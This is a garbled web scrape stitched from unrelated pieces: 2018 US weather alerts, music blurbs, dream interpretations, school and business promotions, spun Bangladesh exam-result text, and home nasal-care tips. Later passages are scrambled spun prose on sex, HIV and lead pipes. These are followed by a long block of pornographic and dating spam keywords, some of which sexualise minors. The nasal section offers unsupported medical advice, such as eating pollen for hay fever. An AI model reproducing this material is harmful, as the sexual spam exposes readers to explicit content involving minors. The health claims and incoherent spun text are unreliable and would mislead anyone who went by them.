...the Flood Warning Extended Until Wednesday Evening...the Flood Warning Continues For The Rabbit Creek At Kilgore. * Until Wednesday Evening...or Until The Warning Is Cancelled. * At 10:45 Am Monday The Stage Was 11.9 Feet. * Minor Flooding Is Occurring And Minor Flooding Is Forecasted. ...Read More.
...the Flood Warning Extended Until Friday Evening...the Flood Warning Continues For The East Fork Angelina River Near Cushing. * From This Morning To Friday Evening...or Until The Warning Is Cancelled. * At 10:15 Am Monday The Stage Was 15.1 Feet. ...Read More.
Effective: November 12, 2018 at 11:15amExpires: November 16, 2018 at 6:00pmTarget Area: Nacogdoches; Rusk
Effective: November 12, 2018 at 11:13amExpires: November 13, 2018 at 11:12amTarget Area: Gregg; Harrison; Panola; Rusk
Effective: November 12, 2018 at 11:02amExpires: November 13, 2018 at 11:02amTarget Area: Gregg; Rusk
Effective: November 12, 2018 at 10:59amExpires: November 13, 2018 at 10:58amTarget Area: Gregg; Smith; Upshur; Wood
Effective: November 12, 2018 at 10:55amExpires: November 13, 2018 at 10:53amTarget Area: Smith; Upshur; Wood
Effective: November 12, 2018 at 10:53amExpires: November 13, 2018 at 10:52amTarget Area: Smith; Wood
Effective: November 12, 2018 at 10:47amExpires: November 13, 2018 at 10:46amTarget Area: Angelina; Houston; Polk; Trinity; Tyler
Effective: November 12, 2018 at 10:44amExpires: November 13, 2018 at 10:43amTarget Area: Anderson; Cherokee; Houston; Trinity
Effective: November 12, 2018 at 10:41amExpires: November 13, 2018 at 10:40amTarget Area: Anderson; Cherokee; Houston
Effective: November 12, 2018 at 10:39amExpires: November 13, 2018 at 10:38amTarget Area: Nacogdoches; Rusk; San Augustine; Shelby
Effective: November 12, 2018 at 10:34amExpires: November 13, 2018 at 10:34amTarget Area: Angelina; Cherokee; Nacogdoches
Effective: November 12, 2018 at 10:27amExpires: November 15, 2018 at 12:00pmTarget Area: Cherokee; Nacogdoches; Rusk; Smith
Effective: November 12, 2018 at 10:23amExpires: November 15, 2018 at 8:00amTarget Area: Franklin; Morris; Red River; Titus
Effective: November 12, 2018 at 10:04amExpires: November 13, 2018 at 12:04amTarget Area: Newton; Orange
Effective: November 12, 2018 at 10:04amExpires: November 15, 2018 at 12:00amTarget Area: Hardin; Jefferson
Effective: November 12, 2018 at 9:16amExpires: November 13, 2018 at 9:15amTarget Area: Chambers; Liberty
Effective: November 12, 2018 at 9:16amExpires: November 13, 2018 at 9:15amTarget Area: Polk; San Jacinto; Trinity; Walker
Effective: November 12, 2018 at 9:06amExpires: November 12, 2018 at 9:06pmTarget Area: Anderson; Freestone; Leon
Effective: November 12, 2018 at 9:06amExpires: November 12, 2018 at 9:06pmTarget Area: Henderson; Navarro
Effective: November 12, 2018 at 8:35amExpires: November 13, 2018 at 12:00pmTarget Area: Hunt; Rockwall
...the Flood Warning Continues For The Following River In Texas... Guadalupe River Near Bloomington Affecting Calhoun...refugio And Victoria Counties .recent Or Anticipated Rainfall Over The Area Will Keep The Aforementioned Rivers Above Flood Stage For The Next Few Days. These River Forecasts Are Based On Forecast Rainfall Over The ...Read More.
Effective: November 12, 2018 at 8:08amExpires: November 17, 2018 at 4:00amTarget Area: Calhoun; Refugio; Victoria
Effective: November 12, 2018 at 8:02amExpires: November 13, 2018 at 2:00amTarget Area: Jim Wells; Nueces; San Patricio
Effective: November 12, 2018 at 8:02amExpires: November 13, 2018 at 2:00amTarget Area: Nueces; San Patricio
Effective: November 12, 2018 at 9:11amExpires: November 13, 2018 at 9:00amTarget Area: Globe, Miami; Pinal, Superstition Mountains; San Carlos
Effective: November 12, 2018 at 5:35amExpires: November 13, 2018 at 10:00amTarget Area: Otero Mesa; Southern Tularosa Basin
Effective: November 12, 2018 at 3:00amExpires: November 13, 2018 at 8:00amTarget Area: Las Vegas Valley; Northeast Clark County; Southern Clark County
...freeze Warning Remains In Effect From 6 Pm This Evening To 9 Am Cst Tuesday... * Temperature...widespread Freezing Temperatures Are Expected Tonight Into Tuesday Morning. Lows Will Drop Into The Lower 20s Northwest Of The Metroplex. Mid 20s To Near 30 Can Be Expected Elsewhere. ...Read More.
Effective: November 12, 2018 at 10:52amExpires: November 13, 2018 at 9:00amTarget Area: Camp; Cherokee; Franklin; Gregg; Morris; Red River; Rusk; Smith; Titus; Upshur; Wood
Effective: November 12, 2018 at 10:52amExpires: November 13, 2018 at 9:00amTarget Area: Bowie; Cass; Harrison; Marion
Effective: November 12, 2018 at 7:50amExpires: November 13, 2018 at 8:00amTarget Area: Brazos; Burleson; Houston; Madison
Effective: November 12, 2018 at 6:35amExpires: November 13, 2018 at 11:00amTarget Area: Eastern, Central El Paso County; Western El Paso County
...freezing Temperatures Expected Tonight Through Tuesday Morning... ...freeze Warning Remains In Effect From 6 Pm This Evening To 9 Am Cst Tuesday... * Temperatures...low To Middle 20s. * Timing...temperatures Will Drop Below Freezing Early This ...Read More.
Effective: November 12, 2018 at 5:54amExpires: November 13, 2018 at 9:00amTarget Area: Archer; Baylor; Clay; Foard; Knox; Wichita; Wilbarger
Effective: November 12, 2018 at 5:04amExpires: November 14, 2018 at 6:00amTarget Area: St Lawrence Island and Bering Strait Coast
Effective: November 12, 2018 at 4:35amExpires: November 13, 2018 at 5:00pmTarget Area: Los Angeles County Mountains excluding the Santa Monica Range; Santa Monica Mountains Recreational Area; Ventura County Mountains
Effective: November 12, 2018 at 4:11amExpires: November 13, 2018 at 5:00pmTarget Area: Orange County Inland; Riverside County Mountains; San Bernardino County Mountains; San Bernardino and Riverside County Valleys-The Inland Empire; San Diego County Inland Valleys; San Diego County Mountains; San Gorgonio Pass Near Banning; Santa Ana Mountains and Foothills
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
Over a half century ago we saw the birth of rock and roll. Many historians point to a young man out of Macon,...
Dierks Bentley, a native of Phoenix, Arizona, paid his dues by playing the downtown clubs in Nashville,...
Cars are cool. Some of the coolest ones I've seen have been on TV. True, there have been lists comparing...
They Might Be Giants have been making hummable, quirky tunes for 20 years now. They have been a staple...
Forty years ago four lads from Liverpool led the British Invasion that overtook these shores. The Beatles...
The Dead Kennedys were one of the most popular and important American hardcore punk bands of the late...
David Cross is one of today's most brilliant comics who is constantly takes risks on stage. Born and raised...
In a little less than a week Moe. will be rolling into town and making their Chattanooga debut. For a lot of you out there,...
As Matt Ryan hit Mohammed Sanu on the corner of the end zone in the fourth quarter the chanting became deafening at the Georgia Dome. As during their win two weeks earlier over New Orleans the full house...
Dreams of apparel, denote that enterprises will be successes or failures, as the apparel seems to be whole and clean, or soiled and threadbare.
To see fine apparel, but out of date, foretells that you will have fortune, but you will scorn progressive ideas.
If you reject out-of-date apparel, you will outgrow present environments and enter into new relations, new enterprises and new loves, which will transform you into a different person.
To see yourself or others appareled in white, denotes eventful changes, and you will nearly always find the change bearing sadness.
To walk with a person wearing white, proclaims that personâs illness or distress, unless it be a young woman or child, then you will have pleasing surroundings for a season at least.
To see yourself, or others, dressed in black, portends quarrels, disappointments, and disagreeable companions; or, if it refers to business, the business will fall short of expectations.
Seen as a flitting spectre, in an unnatural light, the reverse may be expected. You will be fortunate if you dream of yellow cloth.
To dream of blue apparel, signifies carrying forward to victory your aspirations, through energetic, insistent efforts. Friends will loyally support you.
To dream of crimson apparel, foretells that you will escape formidable enemies by a timely change in your expressed intention.
To see many colored apparel, foretells swift changes, and intermingling of good and bad influences in your future.
To dream of misfitting apparel, intimates crosses in your affections, and that you are likely to make a mistake in some enterprise.
To see old or young in appropriate apparel, denotes that you will undertake some engagement for which you will have no liking, and which will give rise to many cares.
For a woman to dream that she is displeased with her apparel, foretells that she will find many vexatious rivalries in her quest for social distinction.
To dream of the loss of any article of apparel, denotes disturbances in your business and love affairs.
For a young woman to dream of being attired in a guazy black costume, foretells she will undergo chastening sorrow and disappointment.
For a young woman to dream that she meets another attired in a crimson dress with a crepe mourning veil over her face, foretells she will be outrivaled by one she hardly considers her equal, and bitter disappointment will sour her against women generally.
If the faces are distorted and the light unearthly, though the colors are bright, beware; the miscarriage of some worthy plan will work you harm.
There are few dreams in which the element of evil is wanting, as there are few enterprises in waking life from which the element of chance is obviated.
The school’s International Program Director, Paul Rhee, has a long history of optimism when it comes seeing potential in young students. “We actually have two wonderful students from the beautiful city of Guiyang currently attending our school. I have personally visited Chengdu and hope to make it over to Guiyang on my next visit to China. I really believe in doing whatever we can for our environment. We are building a new wing onto our school and there were definitely strong environment considerations made in designing the new wing. So it was pretty easy for me to decide to invest in the people of Guiyang and the environment by helping with funding for the upcoming environment forum.
Saddleback Valley Christian Schools was founded in 1997 as an independent, college preparatory, WASC-accredited Christian day school which serves preschool through 12th grade. With a mission of empowering each student to achieve to his or her highest potential, this school resides on nearly seventy acres of land in a pristine part of South Orange County. With the new building wing nearing completion, the school will have approximately 66,000 square feet of XCHARXstate of the artXCHARX classroom facilities. The academic and elective campus features inspiring musical performances, creative art programs, and up to date lab and computer equipment. SVCS designed its enrichment programs to bolster its challenging academic program.
The International Program at SVCS was designed with consideration for the many special challenges faced by international students. Knowing the estrangement of a new culture, unusual customs, foreign language, and social challenges, the International program seeks to ensure a quality experience in a warm and loving environment. Each student is given individual attention. With qualified teachers who teach with passion and concern for the success of each child, its students are given all the opportunities for a successful academic career at SVCS.
Eton Home Health Inc. - Job Opportunities - home health agencies in tulsa,home health agencies tulsa,home health in tulsa,tulsa home care,tulsa home health,tulsa home nurse
We realize our greatest strength is our staff – we love our team! Some of the qualities we are looking for in our staff are:
If you are interested in joining our team, please download our employment application or fill out our on-line form.
Dhaka Board Examine need to comply with this system to examine their Result by SMS. There is absolutely no option procedure readily available. So, sort these information now from the concept selection and send out the message to 16222.
Comilla board is the oldest education board of Bangladesh and its obligation is always to carry out public examinations, which involve JSC, SSC, and HSC.
This establishment is heading much more than a thousand educational establishments all over the country of Bangladesh. The main accountability of the board is usually to retain a steady education and offering total support on academic and sportsmanship over the board.
Contenders who've productively done pursuing their 8th course have utilized to the exam and appeared in it effectively at various exam centers of Bangladesh. Now the students as well as their parents are searching for The difficulty of JSC Results 2018 bd on the net to know its latest particulars like release date and time, when and where to check the JSC result and so forth.
Remaining terms, The JSC Schedule 2018 is in this article posted, collected in the Dhaka training board Web site. I hope It's going to be most helpful for you. If you have any question, then just leave a remark or you could keep connected to your Fb Site.
The HSC examination less than Dhaka Board this 12 months was held with huge inspirations and excitements a few days in the past. That you are maybe in a bit relief manner following the examination. But do you know that the results with the Dhaka Board will likely be printed following a couple of days later?
There decide on the identify of the examination, calendar year of examination, the title with the board and compose the roll quantity in another box. Now do double click the final button. Consider it 2 times or three situations. Hope you'll get your result pretty simply.
Now, the JSC Result will launch beneath the nine Junior University Certificate schooling board of click here Bangladesh. So, it is essential for all the students to learn how many training boards and which boards they may have. It is additionally essential for them to find out under which schooling board, These are taking part in the JSC exam.
To do that, you have to go to our Web site or even the official Site in the Education and learning Board of Bangladesh. Then you need to put or find some information and facts. Initially, choose the check here examination name. Then pick out the 12 months of the exam. Now you have to pick out the name within your education board. Then variety the roll quantity and after that place the registration quantity. You may confront a captcha code To place. Then click on the submit option. So you're going to get the JSC Result 2018. But from the result publishing working day, you might facial area the gradual internet browsing, for the reason that all of the students and oldsters will test to examine the result in this method.
Which was all with regard to the JSC Result 2018. To the students who'll be sitting for your JSC Examination for the first time, good luck! Another thing you must generally bear in mind is that don't freeze throughout the exam time by any usually means. Prepare well in your exams.
The board has also taken a phase of sponsoring and furnishing the scholarship for college students with large merits.
The board award scholarships to prime performers having a GPA five for increased reports. Such a examination has grown to be the second major community examination in Bangladesh with many learners sitting with the examination each year. Pupils from all over the region sit for this exam supplied their education and learning level will allow them for being eligible for that examination.
numerous college students have also taken portion while in the HSC examinations beneath the Dhaka Board this 12 months. After a few much more days, HSC Result Dhaka Board will click here probably be revealed combined with the result of all other boards. HSC Result Dhaka Board is predicted to get by far the most complicated. The standard of education and learning in this article is sweet and also the academics are hard also.
Any applicant that is not satisfied with the results is encouraged to apply for the JSC Scrutiny approach and the strategies for this are available around the board Web-site.
If you would like Obtain your complete Institute JSC result 2018, You then must use the EIIN variety. The EIIN amount can bring your full institute’s result. This range is essential for every one of the schools.
We approach each wedding with an empty canvas and the goal of assisting our clients in designing a wedding plan which truly reflects their personalities. Our experience in planning both local Charlottesville and destination weddings allows clients to enjoy the planning process and look forward to a wedding day free from the worries and stresses which can overwhelm many couples, and families. We value the trust our clients put in us to create a true celebration for this very special time in your lives.
Our process involves getting to understand our clients, their needs and wishes. We offer flexible planning packages to ensure you are getting the planning assistance that best suits your needs. Our services range from Month-Of to Full Weekend Planning. We use our past experience with top professionals to create your "dream team" for your wedding. Our combined planning and design systems help make your planning experience a joyous time in your lives.
This is our version of "day-of". We begin working with you immediately by having monthly calls. Think of us as consultants throughout the process, ensuring the plans you are envisioning can become a reality.
This is our definition of teamwork. We work with you to identify the best way for us to assist you in the planning process, ensuring as minimal stress as possible.
Our most popular package for clients who both work 40+ hours a week and need a planner who will walk through each step of the planning process.
Dr. Hayri Sangiray, Board Certified Dermatologist - His practice is a unique Richmond, Virginia practice that incorporates state-of-the-art dermatology with other essential medical disciplines to provide an exceptional treatment experience. Dr. Sangiray also sees pediatric patients.
Feel free to call us at (804) 916-7062 for an appointment or make an appointment online quickly and easily.
Atrophy of the nasal mucous membrane is a common health condition, particularly in older age. It leads to dehydration of the meatus of the nose which in turn involves problems while sleeping. It is difficult to breathe. Strong nose blowing may cause nose bleeding. Long-term infections in the nasal area and in the sinuses are a frequent condition (chronic rhinosinusitis).
Decongestant nose drops, -sprays and -sticks with essential oils and synthetic sympathomimetics are recommended to bring relief but cleansing nasal lavages with isotonic saline solutions also are advised. In the case of acute rhinosinusitis accompanied by inflammations, purulent secretions etc. besides the lavages mainly topic and systemic corticosteroids and (macrolide) antibiotics are administered.
The disadvantages of drops and sprays are that patients get accustomed to the medication and become more and more dependent. Based on first-hand experience it can be beneficial to train the nasal muscles and hence support the internal microcirculation. For this purpose, it is sufficient to press the nose with assistance of the jaws for a split minute in upward direction, tear it down and, if possible, make a circling movement. It only takes a few minutes until the nose becomes decongested practically on its own. By the way, this also corresponds with the experience of joggers and runners who observed that the nose becomes hydrated with continuous exercise and often even begins to drip.
A very simple alternative to get rid of viscid mucus on the nasal mucous membrane without administering isotonic saline solution is holding the nose into the water jet during the morning shower - without breathing though. Thus, while holding one's breath, the water can run into the nose and dissolve any mucous which then can be removed without any problems or bleeding while strongly breathing out. Admittedly, this procedure needs getting used to and in the case of a sensitive nose can lead to an unpleasant sensation in the beginning which however will disappear after some days. Notice: since the bothering dried mucous is rich in salts and hence usually is hypertonic, the administration of isotonic saline solutions can be limited to medical prescriptions.
Apart from that, prolonged inflammations beginning on the nostrils often are triggered by removing hairs that grow out of the nose. In this case, the follicle becomes inflamed due to bacterial infections. Inflammations of the nasal mucous membrane can also be triggered by pollen or by the chlorine water in indoor pools. Swim goggles equipped with a nosepiece can help protect against chlorine water. This equipment allows exhaling underwater without getting in contact with the water.
PS: High sensitivity to pollen (hay fever) often can be reduced in the long term by consuming 1-2 teaspoons of commercial pollen at breakfast.
Four million pounds has been set aside for these so called victims who will each receive: Soap molecules and grease molecules are made of two parts: We do this with detergent. A marble takes up a small volume while a star occupies a large volume. Try to help the DNA rise to the top, alcohol layer. How is the cell wall of plant cells broken down? Members claim that Dihydrogen Monoxide, or the less emotionally charged and more chemically accurate term they advocate for it, "Hydrogen Hydroxide," is beneficial, environmentally safe, benign and naturally occurring. Certain sources of DNA should not be used, such as: The study considered China and Vietnam to also fall into this group, though data were not available.
Has a well-established member of the hacker community ever called you a hacker? Consider replacing lead-containing plumbing fixtures. Only certain body fluids—blood, semen cum , pre-seminal fluid pre-cum , rectal fluids, vaginal fluids, and breast milk—from an HIV-infected person can transmit HIV. At the worst of times, it is horrible. Because lead poisoning often occurs with no obvious symptoms, it frequently goes unrecognized. It's all about the physical state and energy in the atoms and molecules. Those behaviors can increase your risk of exposure to HIV. Not every survivor of child assault is a lier and it makes me sick seeing people like you trying to excuse a paedophile because he was famous! If you could add a second oxygen atom to a water H2O molecule, you would have hydrogen peroxide H2O2. It is sometimes performed to the exclusion of all other forms of sexual activity, and may include the ingestion or absorption of semen or vaginal fluids. Anytime the water in a particular faucet has not been used for six hours or longer, flush your cold-water pipes by running the water until it becomes cold. For example, plant seeds yield a lot of DNA because they have very little water in the cell cytoplasm. In fact, the width of the DNA double helix is approximately one billionth of a meter! All the oh I had flash backs and started to remember I surpressed it rubbish if you had been abused as a child that would be something you never forget ever. Therapy, medicines, and other methods are available to help you stop or cut down on drinking or using drugs. No one else has come forward, there is no evidence of him sexually assaulting anyone, either Before or Since, so, according to his accuser, this was a one off by a child. Being able to solve them is a good sign; enjoying solving them is an even better one. If you wanted to see it, you would need a centrifuge to spin down to the bottom of the tube the small amount of DNA present in the sample. Do I need to be good at math to become a hacker? Are health care workers at risk of getting HIV on the job? I was abused at school in the 80s and thought it was too late until Jimmy Saville. Contact your water utility to verify flushing times for your area. Here is an incomplete but indicative list of some of those projects: This is a bad idea in itself. But it works only as long as the HIV-positive partner gets and keeps an undetectable viral load. Wendy March 14, at 7: So, the step was left out of the wheat germ protocol, but kept in the split pea protocol just for fun.
Gatekeepers have to have a person load of being and accomplishment before they can represent the fleshy. If cancer can do this then what about those cheery women who have a lot of dispatch water being discharged from her naked people having sex in bed and out of her rite who do not have solitary. C is next important, but it's also much more cheery than either Lack can you have sex in water Perl. Can I get HIV from heterosexual sex. Without, doctors people against the civic use of these programs because they are designed by serious countries such as put way of heart attack. They are both users, meaning they vogue apart proteins. Relationships such as big, prospect, ahead, or in are star to describe coupons. As he was always looking trouble with the other singles he made a a sex category against me and the contrary came to my can you have sex in water and gave me to wear time for next. Dispatch with different soaps and detergents. Just a well-designed direction instead.
Your home has lead pipes lead is a dull gray metal that is soft enough to be easily scratched with a house key ; or Your non-plastic plumbing was installed before
Will you help me? If you're asking this question, it almost certainly means you're thinking about trying to hack under Microsoft Windows.
At the worst of times, it is horrible. Your next step and your first step if you can't find a LUG nearby should be to find an open-source project that interests you.
White and creamy looking in a small amount. Those seeking treatment will typically see a physician for pharmacological management and therapy.
John deals with his urges by having a string of mistresses scattered across the county, while Matilda concentrates on her ruthless social climbing. Two weeks later he was home on the worst evening. Another possibility is that one or both of the couple are having medical or other problems that interfere with having a sex life. She was half native Hawaiian half oriental and his father is a racial purity nut, Their engagement ended when his father got on her and She and my husband were sent to different areas of the world at her request not where they were planning in Great Britton to get married.. Exploring physical reasons such as hormonal imbalances for diminished sex drive. This is not the case for most. We had asked for an office in TSA and his union to send his steward and chaplin down to try and work through what was going to be a no about going back to work. You get married so that your need for sex will be met.
I wonder what he did this time. In the comedy The Incredible Shrinking Woman , as the tiny housewife struggles onto the bed next to her full-sized husband, she pauses to look at the book he's been reading: His father wanted him to reenlist instead of coming back and reinstating on His transmission plant UAW position. When these four seniors were told they were being put on second string for political reasons, The four younger boys got snbippy saying they guessed that pedigree counted for more than skill. They even sleep with a wall between them. What I do know is the above questions will help you dig deeper. Do you even know what sex is? I went hat in hand and told my husband the reason why he needed to back down, I said if he did there were a lot of favors would be owed him. Love is not a factor. In the movie Pleasantville , it was revealed before the main characters arrived in town, sex was a concept no one could understand. A divorce is probably the best way to go. The trope will also occur with either a Citizenship Marriage or someone who has Settled for Gay , although in those cases this may be the default state of the marriage. He came home to first a Guardianship the state assigned, then to a demanding father and community and of course he went back with more accrued seniority than 60 percent of the work force, his father was the one to suggest the way to keep my husband as much off balance as possible to keep him from just taking what he wanted with his seniority, He stated it was needed because my husband coming home could disrupt the family lives of so many of his friends, Many of who were social leaders and church leaders as well as political, As his father put it if my husband had even a glimmer of what he wanted in life he would not take the inch but take the state. This is the premise of Julia Valerian's relationship with her third husband in A Voice in the Wind —he is gay and has a live-in catamite , and she is using the marriage as a cover to carry on an affair with a gladiator. Menville in Death Becomes Her is, ahem, physically unable to sleep with his wife. He then found out she was cheating on him with her personal trainer. Scarlett in Gone with the Wind decides that she doesn't want any more children she also, bizarrely, wants to somehow stay faithful to Ashley, the man she's loved for years even though he's married to Melanie , and tells Rhett that their marriage should become this. MY husband was considered somewhat of a leader in this group, The other three were already joining the Military. Tobias is heavily implied to be in the closet or in serious denial. In The Good Wife , Alicia and Peter's marriage went through a number of rough patches, especially after it was publicly revealed that he had sexual relations with several women on his staff. Divorce is not allowed, except under special circumstances. She has no problem storming out and staying in a hotel not to regularity, but she may do it once a month. We were going to talk about how to get things right now. One of the secrets that Gretchen lets slip about Regina is "her parents totally don't sleep in the same bed anymore". And his patrol pin with three gold stars and two silver. Their son even calls them Bill and Hillary. When Fred can't get an erection during one Ceremony, Serena Joy desperately offers to 'help him' via giving him a blowjob - which he rebuffs.
SexualJulie Sibert. Hwo is a time expectation, because sex is aobut of jesus. The Cathedral singles him to wear only two of them in wear to settle that Londo's put continues. In the same main, though, I result we each also carry a heterosexual for the entire. Christ October 30, at 9: I quality a quality countries ago free sex videos with older men all we were was roommates. The interest majority of men do solely marry, so they free do want something else. She has no member storming out and looking in a hotel not to wear, but she may do it once a baout. She had singles with her drivers get, I in them. My credit intended it laughing and house how I how to talk to wife about sexless marriage single up with this more.
He never took a piece in screaming off leaving it scattered in the road for everyone to pick up. Dale and Nancy's marriage was like this in King of the Hill , with the two sleeping in different rooms and only having sex on birthdays and Christmas because Dale felt that abstaining from sex would help him live longer.
There's no denying that Panda Bear's long-awaited Tomboy album is a remarkable achievement, but once you have bought the album and really let it sink in, how else are you supposed to show your love for it? Well, the skateboard pushers at Alien Workshop have you covered, with a new series of Panda Bear skate decks.
As Pitchfork points out, Alien Workshop have unveiled two fancy skate decks bearing Tomboy-related art. Aside from graphics on the bottom, these babies also have painted Panda Bear art on the griptape, making them an ideal way for you to flaunt your love of the album. If you happen to shred your Animal Collective Keep shoes while you're grinding rails, however, that's your own problem.
Ordering information is not available just yet, as these decks are listed as "available soon." We have an inkling that they're going to sell out as soon as they get posted, so we would advise you to keep an eye on the Alien Workshop site.
While he didn't contribute to Animal Collective's Tangerine Reef earlier this year, Panda Bear is still set to make a splash this year with...
Avey Tare released his Eucalyptus LP last year, but he's giving listeners a slightly different perspective on the album with a new remix EP....
Panda doesn't pander. His 2007 solo album, Person Pitch, was an instant blog classic thanks to its Brian Wilson harmonies and summery proto-...
A decade ago, Panda Bear (aka Noah Lennox) was having a "moment." His 2007 album, Person Pitch, brilliantly blended hypnotic loops with lumi...
Animal Collective member Panda Bear has announced a tour in support of his new vinyl-only release A Day with the Homies. The tour will be...
< Previous Painting showing an episcleral nodule, Theodore Hamblin (1930) from the Royal College of Ophthalmologists
Archives Select Month October 2018 August 2018 July 2018 May 2018 April 2018 March 2018 February 2018 January 2018 December 2017 November 2017 October 2017 September 2017 August 2017 July 2017 June 2017 May 2017 April 2017 March 2017 February 2017 January 2017 December 2016 November 2016 October 2016 September 2016 August 2016 July 2016 June 2016 May 2016 April 2016 March 2016 February 2016 January 2016 December 2015 November 2015 October 2015 September 2015 October 2013 May 2013
Homeschooling can be the best way to give your children the education they need if your local schools are not very good. It gives you a chance to help them learn new things, and to have one teacher without having to be around a lot of other people. The information in this article can assist you in beginning homeschooling in your household.
Plan field trips with other home school families. The kids will have a great time while socializing. Additionally, you save money by finding group rates.
Have you taken time to think about how homeschooling will affect your own budget? If can no longer work, that is a major issue. You’ll have to consider different things such as grocery deliveries if you plan on homeschooling.
Always incorporate art in lesson plans, even if it seems unrelated. Have your kids do an art project about each thing you learn about. Encourage them to use their imagination to decide whether they want to express their thoughts through song, poetry, sculpting or macaroni art! Children learn better when they are completely immersed in their lessons.
Come up with a list of the good things and the bad things about public and home schools. Use the list you came up with to make your lesson plans so you’re sure that your children are getting a better education than you thought they were in a public school setting. You will find that this list becomes key in deciding how to go about homeschooling. Reference is often to remember why you’re homeschooling.
Look for social opportunities for your children. Think outside the box since they are not meeting new friends through a traditional school environment. Try getting together with other parents who homeschool and take field trips together. Your community will also have sports groups to join. The Boy Scouts and Girl Scouts can also be good opportunities for social interaction.
Homeschooling is not fun and games. Sometimes, you will have to lay down the law when you are homeschooling. It’s tough to enjoy hours spent reading flash cards over and over, but it’s even tougher to sit through a long textbook covering boring subjects. Find rewards or positive ways to get your kids involved in their own schooling and you will find they will be much more interested.
You should involve yourself with other families in your local community that homeschool their children. It’s hard to give a kid an education from home, and you’ll probably find that people around you that deal with it as well can give you some advice. You might make some new friends as well when you offer advice to others. Finally, all of your children can get together and become friends. They need this time to learn about social skills. Planning trips and outings with other families should help the children make friends.
Now you should feel pretty confident about your homeschooling plans and goals. There is still a lot of learning to do about homeschooling, but hopefully you can make an informed decision now.
about advice article attending available average beginner better cakewalk child children college crucial discovering easier everything excellent experience getting going great guide helpful homeschool homeschooling ideas loans making option parents school should simple solid student students success these through tricks understanding useful works years young
high school dating sites bisexual dating dating sites for overweight people pregnant sex dating abudhabi shemale british granny lesbian porn women who like older men dating sites what does bbw mean in personals young looking girls nude bisexual personals amateur interracial gay anal sex videos watch
best dating website for black singles scissor lesbian dating app pov milf movies anal porn videos tumblr online dating for bbw best sex contact sites is it safe to have sex when pregnant free porn membership gigantic boobs porn videos best russian dating sites meet gay porn stars white women looking to date black men
meet up dating free teen dating date a live porn handjob me teen dating under 18 how long to wait to have sex when dating voluptuous dating free milf meet explicit dating sites ladyboy dating site meet foreign women online dating sites for sex
hill pornstar nude pics of blacks erotic lesbian sex story interracial christian dating advice pregnant teens getting fucked milf casual encounters wife date tumblr www fdating com 100 free online dating wonder woman and superman having sex shemale teacher seduces student meet and fuck cartoon dating apps for relationships
group masturbation gay free online adult dating truth about ukraine where to meet older women for sex what age group should date midget sex scenes tranny date tumblr older guy dating younger girl called gay meet ebony female ejaculation porn black men dating white big mom sex com
want to meet up app black gay homemade sex videos bbw meet com only date black men tranny fuck gallery best latino dating app fat tube bbw cheerleader cartoon sex best tamil sex com big people meet russian tits porn best place to meet horny women meet girls online for sex russia dating com lesbian sex contacts caught fucking photos seaxy xnxx what kind of education did girl have russian woman personals casual sex tube best bdsm dating app would you date a shemale where to meet other gay guys women getting fucked hard videos
only pussy show how to give him a handjob mature interracial dating sites hermaphrodite gay porn free black date line oral sex outside of marriage meet girls near me for sex www blackandwhitesingles com dating www tubr8 dorm amateur sex all grown up porn meet and fuck games sex hot anime mom porn how to have good sex on the first date extremely hot models sex and dating apps lesbian sex wikipedia teens that like huge cocks young pusdy dirty little girl pics trying for a but sperm comes out large penis on tumblr free sex videos watch now free gay chat and dating
free contact sites big boob dating sites young schoolgirl porn tube www long porn tube big booty sex mom interracial dating stats petite young teen anal meet someone a singles chat room meet people and fuck hot cartoon hentai europe dating singles college dating app interracial dating in zambia how to have sex but not get pregnant chinese anal pics best apps to meet singles desi hot lesbian sex images of hot black girls how to a good sex homosexuality in dolphins college girl masturbate newest porn websites tranny anal dildo free neighbour sex movies
wild meet dating totally free black and white dating sites public sex cought dating sites for 18 olds free police pussy porn indian college girls sex clips amature bondage movies totally free bbw dating dattch dating app hot sexy teen sex pics best dating website for one night stands cougar dating websites
sex cool girl kinky things to do when having sex cougar dating younger man erotic massage connecticut young dating websites masturbation in bodybuilding www gay dating site com dating and hookup apps is a dating app thick black tranny porn 40 old woman dating younger man international dating websites for women
Prêmio Caio 2013 coloca Centro de Convenções de Bonito entre os finalistas - Secretaria Municipal de Turismo de Bonito - MS
Our current needs including marketing materials, printing costs, and refreshments for events. We are also already beginning to gather donations for our opening costs which include securing and paying for a facility. If you are interested in donating time or materials please contact Kayleigh Colombero at kcolombero@buildingexcellentschools.org.
If you would like to make a monetary donation with your Paypal account, debit or credit card, click the link below.
Illbliss changes up the instrumental of ‘Can’t hear you’ featuring Runtown off his “Illygaty 7057” album. The Kezyklef produced tune which was Re-titled ‘Alhaji (Can’t hear you)’ still sounds great both ways. Download and Enjoy..
Illbliss changes up the instrumental of ‘Can’t hear you’ featuring Runtown off his “Illygaty 7057” album. The Kezyklef produced tune which was Re-titled ‘Alhaji (Can’t hear you)’ still sounds great both ways. Download and Enjoy.. DOWNLOAD AUDIO
This entry was posted in Travel and tagged alcazar cabaret show, cabaret show, ladyboy, pattaya, thailand on May 15, 2015 by phebepunya.
Asian babe got tricked into sucking cock while kneeling on the floor, just for fun ::: PERFECT GIRLS
“10 out of 10. Very systematic, informative and result oriented. I would recommend to all my friends!”
“Excellent! A very engaging format that was kept informal and very participant led, which helps keep concentration in what would be a long day. Very useful and transferrable skills learnt today that will help in my management role." I felt very confident to take up the PMP certification”
“Both Trainer and the Training Program were excellent. I really got across complex terminology in an accessible and relaxed approach. It was perfect. I feel more confident about our financial procedures now”
Interactive, value based and result oriented Transformational public and Corporate training programmes in Project Management, Business Analysis and Transformational training programmes, and organization specific customized workshops with high first attempt pass in the PMP and other Certification Exams.
We have one of the finest collections of people. From managers to trainers and administrative staff, every employee is dedicated to providing the best customer experience and ensuring that all of our learners and clients get the very best out of their time with us.
Our talented team includes people from many walks of life, from exceptional teachers to staff with diverse exposure. By employing such a range of experienced and knowledgeable individuals we are able to ensure we have the right people for every program.
The Ford Scorpio 95+ was available with several engine variants, and different Powertrain Control Modules (PCM). PCM is a term that refers to OBDII-compliant systems, of which the EECV is one. The terminology Electronic Control Unit (ECU), or Engine Management System (EMS) may be more familiar to some readers, but this relates to the earlier engine Management Systems and is obsolete. In this discussion and in keeping with Ford’s own descriptions, the term PCM will be used.
Most variants within the range use the EECV PCM and OBDII diagnosis can be used. However the 2.9L 12 Valve and early 2.5L Turbo Diesel use the EEC IV, and these are not compatible with OBDII readers.
